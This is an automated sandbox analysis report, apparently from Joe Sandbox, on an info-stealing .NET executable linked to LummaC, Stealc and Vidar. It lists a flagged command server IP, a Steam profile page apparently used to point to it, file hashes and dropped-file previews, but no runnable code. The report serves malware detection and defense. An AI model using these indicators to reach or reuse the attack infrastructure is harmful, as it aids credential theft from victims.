https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/M	RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/account/cookiepreferences/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/	76561199780418869[1].htm.3.dr	true	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe	false	URL Reputation: safe	unknown
https://5.75.211.162BKFCB	RegAsm.exe, 00000003.00000002.2183942555.0000000000582000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://www.entrust.net/rpa0	file.exe	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	true
5.75.211.162	unknown	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519653
Start date and time:	2024-09-26 19:48:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/9@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 43 Number of non-executed functions: 60
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:49:38	API Interceptor	1x Sleep call for process: RegAsm.exe modified
13:49:50	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.102.49.254	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse
	HHXyi02DYl.exe	Get hash	malicious	Unknown	Browse
5.75.211.162	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	HHXyi02DYl.exe	Get hash	malicious	Unknown	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	Xerox-029_Scanned.pdf	Get hash	malicious	Phisher	Browse	23.195.92.153
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	phish_alert_sp2_2.0.0.0(10).eml	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27
	https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B	Get hash	malicious	Unknown	Browse	88.221.169.152
	https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylink	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	2.16.202.91
	Final_Contract_Copy-532392974.pdf	Get hash	malicious	Unknown	Browse	23.56.162.185
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Final_Contract_Copy-532392974.pdf	Get hash	malicious	Unknown	Browse	23.203.104.175
	https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylink	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	2.19.126.78
HETZNER-ASDE	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	g3V051umJf.html	Get hash	malicious	Unknown	Browse	195.201.215.225
	https://iskiosvillas.gr/booking/AAMAyYwBGAAAAAAB2B1ZmTNuNBwBbZXOiMVmgTZdxswVIV.html	Get hash	malicious	Unknown	Browse	78.46.90.29
	Contract_Agreement_Wednesday September 2024.pdf	Get hash	malicious	Unknown	Browse	88.198.19.212
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	https://is.gd/fxcRir	Get hash	malicious	Unknown	Browse	168.119.146.39
	https://bostempek.vercel.app/	Get hash	malicious	Porn Scam	Browse	136.243.69.157
	https://312d5c44.flca.pages.dev/	Get hash	malicious	TechSupportScam	Browse	195.201.57.90

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254
	Payment copy.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe	Get hash	malicious	GuLoader, Lokibot	Browse	104.102.49.254
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	104.102.49.254
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	104.102.49.254

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_e235e8390a5f5d4ab4774135de2aa259e4fc77_f98b0a6f_25a09605-2cc1-4c26-9cf8-a24aca792532\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1831077443001623
Encrypted:	false
SSDEEP:	192:sg3tvTeFy/K+j0Nvw4Mjez/Zr80uUUzuiFAZ24IO8Z:sQHK+QNvw5jeKKUzuiFAY4IO8Z
MD5:	54EDCCC8C342BFB68D82E9198E7414DE
SHA1:	F769DE24108465D5A8969986F80215CF6FEB3A93
SHA-256:	E86FDD6CB68726DB6BCCB6DA89CC3F4436086B4DAC00369B0F7C006A758DFB56
SHA-512:	23C9CC1624935440683317460FF15B33F35C3A7F45AFE6EDAB35F21F16BE2D6053BDA2A6772EB1A5DC5717C06D6498174A37729D3D1F9EA641CEE11CAE221524
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.4.6.5.7.8.6.5.7.0.1.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.4.6.5.7.9.2.9.7.6.3.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.a.0.9.6.0.5.-.2.c.c.1.-.4.c.2.6.-.9.c.f.8.-.a.2.4.a.c.a.7.9.2.5.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.4.0.4.e.e.e.-.8.5.0.c.-.4.a.5.d.-.8.4.c.3.-.3.3.3.8.0.7.7.e.3.1.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.2.c.-.0.0.0.1.-.0.0.1.4.-.4.3.3.6.-.f.3.6.3.3.c.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9397.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Sep 26 17:49:38 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	167536
Entropy (8bit):	1.7732000115222502
Encrypted:	false
SSDEEP:	768:ddpQu5HF5SqKDsOQw1J933aqlvw52mJwNA/HBSp:dXrwDsA1JheeYHBSp
MD5:	A7DAB80D8FD3A5D1D279BE37425D5017
SHA1:	7027BF644D81CE0F878FC687C141AB284B235F27
SHA-256:	C016391F5AA48D651B3AEED7A5ADF9FC149E7A9843FFF824173E89AD2829277D
SHA-512:	A94ECE5EBE5179FEB653FAA70DA9B656CEE7B4F02B38A1EDBB04569429F73EBE4810732B10B46965BF6D7C6E40CAD99BE1DE590A1A7F8E55615F8922A890B4C7
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f........................."..(.......$....+......d...TY..........`.......8...........T...........`U...9...........+...........-..............................................................................eJ......l.......GenuineIntel............T.......,......f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94F0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6304
Entropy (8bit):	3.714928989980564
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbEI6xYvJ1QQck2K5aM4Up89bi2sf32m:R6l7wVeJEI6xYvJWQWiprp89bi2sf32m
MD5:	D63FB61EB1B71E3AC7CA1FA97EF706B1
SHA1:	FEB0830EDBE70A5382536E1053CFEE8843097C59
SHA-256:	B40AAF5A49BB182A60BAFDA2B0DFDFCD5957BE54CBE2D9393AF697BF9E87752B
SHA-512:	01443BCE7621C25DBDBEBEA104B0901022C984026D716A86FDC1920873A88E7C967B91757AC36FA3ABAC93A41FDA7FF4502FDAC5EA895425AA151AFC726E29DE
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER956E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4636
Entropy (8bit):	4.444488419661934
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEJg77aI9UfWpW8VYjt9Ym8M4Jfu4nFH+q8oTqQgLuOLuKrd:uIjfCI7aO7VacJfuSvmBukuKrd
MD5:	DBCE20F3B3558C1E6A26F07FC7C4C731
SHA1:	35389F6B08484AB1F3D5F31D5A02045594FE9109
SHA-256:	CAFF8E9A32079310D7E828F2460DDD11140AAAB33C66210BBCA5DE5DD8B655D4
SHA-512:	E0273DF4141FBEF87B45C2D23CC9B9895CE4E363B3AA628E2EB87078BA4B59879973121C76AD3C76FED14C63B175F82E18B5B2038203019C3BA1CBD486D2900E
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517492" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398405402490007
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sw:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFx
MD5:	F6B10322E08A95D30EEF39D0EC75514F
SHA1:	9D7E2F09A02BA4E3FADD02BBFCC6BF4B9617AF50
SHA-256:	2624CFEC0601E354D516EFC40D8EF1EEA54393599D8DB8361D873CF33E2C2375
SHA-512:	0DAF608649E2F05582B075529A923849BFF99F8EEF713EF55B72AFE7358FB241E2F0CCF4BFFF69EB9380346847F44413BAFA7F7D4D475E545BD4A8A1A7350216
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:7B6:7s
MD5:	CD0241B19FC162810B53D6C9D6EB3DEF
SHA1:	04A7B4F0F599D0C739BBD367CE7587024E26FE92
SHA-256:	F8DD2C93C493A3B940C95480D4B9AA8DB77909BD80FAE6B48B118CC59D3A9E79
SHA-512:	03358054904B679D7A267ABFA6640D6E9E682FFB18A034A2EA32BE43299517A6F353ED1B3C661B6C8570EBBB74AFA6C97F162F67EBE41BFB87BE89054A14B0C8
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466322573580201
Encrypted:	false
SSDEEP:	6144:VIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSb+:WXD94zWlLZMM6YFH8++
MD5:	6EBC279C52E49E88C903B82572FD756E
SHA1:	B14864D1CF6A9D3845D65CD9B5FD33518FC03177
SHA-256:	AC0955DC79A1942EA15946B10791473574DED75EA74D5C5C8D16B0334F019067
SHA-512:	9FA094031738135A3EB6F8B755FCC482BBBFCF1E8AA23540412F2661C3D9562505920F3526BEE7FFCD0B77D8EF4C1602E25AC007505897A85EC06E5EC4C75E22
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...u<................................................................................................................................................................................................................................................................................................................................................h.A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	2.2845972159140855
Encrypted:	false
SSDEEP:	3:i6vvRyMivvRya:iKvHivD
MD5:	45B4C82B8041BF0F9CCED0D6A18D151A
SHA1:	B4DAD3FFFEF507CBB78671EE620BB495F8CE22F1
SHA-256:	7CFA461ED1FC8611AB74878EDB1FBBDE3596F5D042946A42A7F31EB6D462E628
SHA-512:	B29C3696A8A311EFAF9B9709BA082FF2C8D45A6912D79BC1DE7FEEFBEF8F8DDEFCD6650B5E1165D0A79800C8AED399E2B11BC2431E3837DD8587516BDE50EAB5
Malicious:	false
Preview:	0..1..2..3..4..0..1..2..3..4.....

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989396884849224
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	4453d7bc66e29c48ed6495bfa820e5b5
SHA1:	da622e588d635bbadd7ff04ad3df5db191ff0549
SHA256:	941e7002f11290e3ed9dd99d8cc0abc62f6cf69b923ae30b89741579854a8a70
SHA512:	d23950922301cf5cf2e489e5d50e76f2b92ee0b02a4ec3cff532cce72ff3e86a4668d65431402b772570bc9a6d6991f7e6848991e9a66ecb2227ce4b4d5d6306
SSDEEP:	6144:hReQugxZ1Af9bSqoU5GMSUfoVs6ZPTl0ocTpSqN8r2JNrHzJGGO78M6p+z3ZLq2Z:huXSqoUM2qsQJ28SvrE6wLq2syEO
TLSH:	F494231D264E051BD9E647F070E6F90ABE72B44F6ADAE13FF0A6B919B555310032F870
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x463c3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F591A9 [Thu Sep 26 16:54:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
